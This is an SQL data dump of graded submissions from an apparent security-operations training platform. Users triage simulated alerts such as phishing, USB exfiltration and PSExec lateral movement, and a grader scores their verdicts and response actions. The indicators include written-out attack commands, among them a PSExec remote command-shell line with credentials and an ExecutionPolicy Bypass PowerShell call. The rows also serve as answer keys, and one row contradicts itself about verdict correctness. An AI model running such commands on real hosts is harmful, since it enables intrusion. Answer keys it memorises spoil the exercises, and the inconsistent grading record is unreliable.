(479, 225, 1455, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:52:25 PM\\nALERT: Data Exfiltration Attempt [OP: Operation CryptoCore]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 185.93.1.23\\n- [USERNAME] jane.doe\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] financial_report_Q3.xlsx\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:52:31.894Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 05:51:41', '2026-03-09 05:52:31', 0, NULL),
(480, 225, 1366, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 4:55:17 PM\\nALERT: Suspicious LinkedIn Connection Request [OP: Operation Dream Job]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.10\\n- [EMAIL] john.doe@toptechtalent.com\\n- [IP] 203.0.113.45\\n- [URL] http://maliciouslink.com/joboffer\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T05:55:22.270Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 09:02:14', '2026-03-09 05:54:14', '2026-03-09 05:55:22', 0, NULL),
(481, 225, 1367, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-09 05:55:22', '2026-03-09 05:55:22', 0, NULL),
(482, 266, 268, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 15/03/2026, 20:14:10\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-15T14:44:25.641Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 12:23:18', '2026-03-15 14:44:25', 0, NULL),
(483, 55, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-09 12:47:22', '2026-03-09 12:47:22', 0, NULL),
(484, 266, 1431, 'graded', 90, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"hash-d41d8cd9\",\"cmd-1\"],\"selectedActions\":[\"isolate_host\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 09/03/2026, 18:56:28\\nALERT: Data Exfiltration via USB Device Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.10\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [COMMAND] copy C:\\\\Sensitive\\\\report.pdf E:\\\\\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Isolate Host\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T13:26:47.804Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"reset_credentials\"],\"strengths\":\"Solid analysis\"}', '2026-03-09 16:26:33', '2026-03-09 13:19:33', '2026-03-09 13:26:47', 0, NULL),
(485, 266, 1439, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"ip-192.168.1.55\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 09/03/2026, 19:11:51\\nALERT: Possible Insider Data Leak Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.1.55\\n- [EMAIL] personalemail@example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T13:42:00.340Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 16:40:20', '2026-03-09 13:32:20', '2026-03-09 13:42:00', 0, NULL),
(486, 232, 738, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.0.2.25\",\"ip-192.168.1.15\",\"artifact_1\"],\"selectedActions\":[\"close_alert\",\"escalate\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 11:49:30 PM\\nALERT: Suspicious Email Flagged as Possible False Positive\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.0.2.25\\n- [IP] 192.168.1.15\\n- [EMAIL] newsletter@trustedsource.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T18:19:31.760Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 21:25:10', '2026-03-09 18:18:10', '2026-03-09 18:19:31', 0, NULL),
(487, 232, 938, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.5.15\",\"ip-192.168.5.20\",\"cmd-1\"],\"selectedActions\":[\"close_alert\",\"escalate\",\"collect_forensics\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 11:52:16 PM\\nALERT: Failed Process Execution from Internal Script\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.5.15\\n- [IP] 192.168.5.20\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T18:22:17.089Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 21:24:54', '2026-03-09 18:19:54', '2026-03-09 18:22:17', 0, NULL),
(488, 232, 1310, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.5.25\",\"artifact_2\"],\"selectedActions\":[\"close_alert\",\"collect_forensics\",\"escalate\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 11:53:28 PM\\nALERT: False Positive: Legitimate Cloud Configuration Change\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.5.25\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T18:23:29.698Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 21:31:37', '2026-03-09 18:22:37', '2026-03-09 18:23:29', 0, NULL),
(489, 225, 681, 'graded', 60, 'Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.0.2.10\",\"ip-192.168.5.10\",\"domain-http://legit\",\"artifact_1\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 10:40:37 AM\\nALERT: Phishing Email Detected with Clean URL\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.0.2.10\\n- [IP] 192.168.5.10\\n- [DOMAIN] http://legitimate-site.com\\n- [EMAIL] info@securemail.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T23:40:49.901Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', '2026-03-10 02:39:25', '2026-03-09 23:30:25', '2026-03-09 23:40:49', 0, NULL),
(490, 225, 611, 'graded', 60, 'Verdict is correct (+40). Missed critical artifacts: command psexec.exe \\\\192.168.1.25 -u admin -p password cmd.exe (0/1). Missed response actions (2/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-192.168.1.25\",\"cmd-1\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 11:01:23 AM\\nALERT: Internal Network Lateral Movement via PSExec\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 192.168.1.25\\n- [COMMAND] psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T00:01:36.602Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe (0/1). Missed response actions (2/3)\",\"missed_items\":[\"command: psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-10 03:05:34', '2026-03-09 23:59:34', '2026-03-10 00:01:36', 0, NULL),
(491, 225, 1372, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:16:27 AM\\nALERT: Brute Force Attack Detected from Malicious IP\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 203.0.113.45\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:16:26.465Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-10 03:06:54', '2026-03-10 00:01:54', '2026-03-10 22:16:26', 0, NULL),
(492, 34, 1461, 'investigating', NULL, NULL, NULL, NULL, '2026-03-10 03:39:47', '2026-03-10 00:31:47', '2026-03-10 00:31:47', 0, NULL),
(493, 271, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-10 05:08:11', '2026-03-10 05:08:11', 0, NULL),
(494, 251, 269, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"escalate\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 10:55:21 AM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T05:25:26.772Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 05:22:50', '2026-03-10 05:25:26', 0, NULL),
(495, 251, 270, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 10:58:28 AM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T05:28:29.664Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 05:25:26', '2026-03-10 05:28:29', 0, NULL),
(496, 225, 1466, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.105\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:18:32 AM\\nALERT: Initial Access via Spear Phishing [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.105\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [DOMAIN] update-portal.example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:18:34.663Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-11 01:25:25', '2026-03-10 22:17:25', '2026-03-10 22:18:34', 0, NULL),
(497, 225, 1467, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.15\",\"hash-d41d8cd9\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:19:52 AM\\nALERT: Execution of Malicious Payload [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.15\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] payload.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:19:55.365Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 22:18:34', '2026-03-10 22:19:55', 0, NULL),
(498, 225, 1468, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-d41d8cd9\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:20:38 AM\\nALERT: Persistence through Backdoor Installation [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] backdoor_installer.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:20:40.202Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 22:19:55', '2026-03-10 22:20:40', 0, NULL),
(499, 225, 1469, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.5.12\",\"ip-192.168.1.50\",\"hash-d41d8cd9\",\"domain-CORP\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:22:13 AM\\nALERT: Lateral Movement to Wiretap Systems [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.0.5.12\\n- [IP] 192.168.1.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [DOMAIN] CORP\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Reset Credentials\\n- Collect Forensics\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:22:20.030Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 22:20:40', '2026-03-10 22:22:20', 0, NULL),
(500, 225, 1470, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"ip-203.0.113.45\",\"hash-5d41402a\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:23:22 AM\\nALERT: Exfiltration of Sensitive Communications [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.10\\n- [IP] 203.0.113.45\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [FILENAME] wiretap_data.zip\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:23:21.429Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-10 22:22:20', '2026-03-10 22:23:21', 0, NULL),
(501, 225, 629, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.12\",\"ip-185.143.223.42\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/11/2026, 9:24:46 AM\\nALERT: Suspicious Network Connection Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.1.12\\n- [IP] 185.143.223.42\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T22:24:49.308Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"monitor_traffic\"],\"strengths\":\"Solid analysis\"}', '2026-03-11 01:32:39', '2026-03-10 22:23:39', '2026-03-10 22:24:49', 0, NULL),
